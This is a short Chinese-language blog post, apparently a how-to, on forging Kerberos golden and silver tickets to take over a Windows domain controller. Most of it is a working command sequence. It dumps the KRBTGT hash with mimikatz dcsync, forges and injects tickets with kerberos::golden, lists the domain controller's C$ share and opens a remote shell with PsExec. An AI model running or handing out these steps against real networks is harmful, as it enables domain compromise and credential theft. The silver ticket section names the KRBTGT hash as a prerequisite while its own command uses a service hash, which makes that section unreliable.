黄金票据和白银票据获取域控权限

早过忘川 提交于 2020-04-06 02:01:40

黄金票据

前提条件

  1. 域名称
  2. 域的SID值
  3. 域的KRBTGT账户的 Hash NTLM
  4. 伪造的用户名(这里是 administrator ),可以是任意用户甚至是不存在的用户

利用

mimikatz的下载地址:https://github.com/gentilkiwi/mimikatz
PsExec的下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

ipconfig /all    #获取域名(前提条件1)

whoami /all    #获取域SID值(前提条件2)

lsadump::dcsync /domain: /*域名*/  /user:krbtgt    #获取KRBTGT账户的 Hash NTLM(前提条件3)

klist purge    #删除票证

kerberos::golden /admin:administrator /domain: /*域名*/  /sid: /*SID*/  /krbtgt: /*Hash NTLM*/ /ptt    #伪造票据(前提条件4)

dir \\abc.test.com\c$    #查看域控的C盘目录(abc.test.com为域控全名)

PsExec.exe \\abc.test.com cmd    #使用PsExec获取一个cmdshell

白银票据

前提条件

  1. 域名称
  2. 域的SID值
  3. 域的KRBTGT账户的 Hash NTLM
  4. 伪造的用户名(这里是 test ),可以是任意用户甚至是不存在的用户

利用

伪造票据命令如下:

kerberos::golden /domain: /*域名*/ /sid: /*SID值*/ /target: /*域控全名*/ /service:cifs /rc4:/*Hash NTLM*/ /user:test /ptt
标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!